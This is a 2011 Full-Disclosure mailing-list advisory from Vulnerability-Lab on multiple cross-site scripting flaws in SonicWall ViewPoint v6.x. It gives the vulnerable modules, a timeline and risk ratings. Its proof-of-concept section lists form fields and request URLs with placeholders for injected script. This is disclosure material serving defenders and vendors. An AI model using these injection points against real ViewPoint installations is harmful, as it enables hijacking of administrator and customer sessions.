'[Full-disclosure] Sonicwall Viewpoint v6.x - Multiple Web'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Sonicwall Viewpoint v6.x - Multiple Web
From:       "research () vulnerability-lab ! com" <research () vulnerability-lab ! com>
Date:       2011-09-26 3:19:37
Message-ID: 4E7FEF49.7080905 () vulnerability-lab ! com
[Download RAW message or body]

Title:
======
Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities


Date:
=====
2011-09-26


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=195


VL-ID:
=====
195


Introduction:
=============
SonicWALL ® ViewPointâ„¢ ist ein benutzerfreundliches webbasiertes Reporting-Tool, das die \
Sicherheitsprodukte und -dienste  von SonicWALL vollstÃ¤ndig unterstÃ¼tzt und erweitert. Es \
kann flexibel als Software oder virtuelle Appliance implementiert  werden. Umfassende \
Reporting-Funktionen geben Administratoren einen unmittelbaren Einblick in den Zustand, die \
Leistung und  die Sicherheit ihres Netzwerks. Mithilfe der anpassbaren Ãœbersichtsanzeige und \
einer Vielzahl von Verlaufsberichten unterstÃ¼tzt  SonicWALL ViewPoint Unternehmen aller \
GrÃ¶ÃŸen dabei, Netzwerknutzung und SicherheitsaktivitÃ¤ten zu Ã¼berwachen und die  Webnutzung \
anzuzeigen.

(Copy of the Vendor Homepage: \
http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html)


Abstract:
=========
Vulnerability-Lab Team discovered multiple Input Validation Vulnerabilities on SonicWalls \
Viewpoint appliance/application.


Report-Timeline:
================
2011-05-16:	Vendor Notification
2011-06-21:	Vendor Response/Feedback
2011-**-**:	Vendor Fix/Patch
2011-09-26:	Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Sonicwall Viewpoint v6.x & older versions


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected on sonicwalls viewpoint & \
global management application. The persistent vulnerability allows an local low privileged user \
account to manipulate specific application modules or content requests.


Vulnerable Module(s): (Persistent)

					[+] SonicWall Training (Titel; RSS_URL;Logs Mail)
					[+] Current Sessions (Titel)
					[+] Add Componente
					[+] Report Layout / Template
					[+] Scheduled Reports
					[+] Security Dashboard
					[+] Custom Report â€“ Website Filtering
					[+] SonicWall Today
					[+] SonicToday Pagetitle
					[+] SonicToday log title


1.2
Multiple non-persistent input validation vulnerabilities are detected on sonicwalls viewpoint & \
global management application. The non persistent vulnerability allows an remote attacker to \
hijack customer/admin session with high required user inter action.

Vulnerable Module(s): (Non Persistent)	

					[+] FTP Usage / Top Users of FTP /  Web Usage Top Sites 
					[+] Show Logs
					[+] Description
					[+] Security Dashboard


Picture(s):
					../ive1.png
					../ive2.png
					../ive3.png


Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts.
For demonstration or reproduce ...

Section: Top FTP Users
<input type=hidden name="reportType" value="singleday_report" />
<input type=hidden name="wrapped" value=">"<INSERT YOUR SCRIPTCODE HERE!>" />
<input type=hidden name="updatePerm" value="1" />
<input type=hidden name="node_id" value="UT1258498415223005056BA2A2D" />
<input type=hidden name="t" value="Reports_FTPUsage_ByUser_Snwls" />
<input type=hidden name="level" value="3" />
<input type=hidden name="r" value="60" />
<input type=hidden name="page" value="reports/topTenReport.jsp" />
<input type=hidden name="p" value="7640" />
<input type=hidden name="action" value="showPage" />
<input type=hidden name="report_id" value="180" />
<input type=hidden name="help_url" value="http://help.xxx.com/help.asp?l=<INSERT YOUR \
SCRIPTCODE HERE!>" /> <input type=hidden name="unused" value="1" />
<input type=hidden name="isTimeBasedReport" value="0" />
<input type="hidden" name="bidirection" value="0">


Section: License Viewpoint
<form method="post" action="login.jsp">
<input type="hidden" name="login" value="1"/>
<input type="hidden" name="url" value="/stats/pdf?sn=<INSERT YOUR SCRIPTCODE HERE!>
<input type="hidden" name="sn" value=">"<INSERT YOUR SCRIPTCODE HERE!>"/>
Username: <input type="text" name="userName"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>

createDataBox(unescape(''),'','logs','2','284','5','5','Logs"><h1><INSERT SCRIPTCODE \
HERE!><"','DBC1269337065018005056BA2A2D','0','3','1','null'); <-- ;)

References: [x] <=
http://viewpoint.xxx.com/sgms/granular_report?action=view_report_action&template_id=100&config_id=7&config_name=facebook&node_id=UT1258498415223005056BA2A2D&successURL=
 http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/topTenReport.jsp&repor \
t_id=180&level=3&node_id=UT1258498415223005056BA2A2D&unused=1&updatePerm=1&help_url=http://help.xxx.com/help.asp?l=eng&t=Reports_FTPUsage_ByUser_Snwls&p=7640&r=60&wrapped=
 http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/loginReport.jsp&level= \
3&node_id=UT1258498415223005056BA2A2D&firewall_reports_id=4327&report_id=310&sortCol=%20Time%20&sortOrder=1&total_records=1287&chartType=null&displayType=[x]&record_offset=
 http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/logviewer/showlog2.jsp \
?serial_number=0017C51036B8&level=3&node_id=null&firewall_reports_id=0&report_id=null&sortCol=Dst%20Interface&sortOrder=0&total_records=397804&chartType=
 http://lmdashboard.xxx.com/stats/pdf?sn=


Risk:
=====
The security risk of the persistent vulnerabilities are estimated as medium(+).
The security risk of the non-persistent vulnerabilities are estimated as low.


Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties,  either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business  profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some  states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation  may not apply. Any modified copy or reproduction, including partially usages, of \
this file requires authorization from Vulnerability- Lab. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of  other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright  © 2011|Vulnerability-Lab




-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic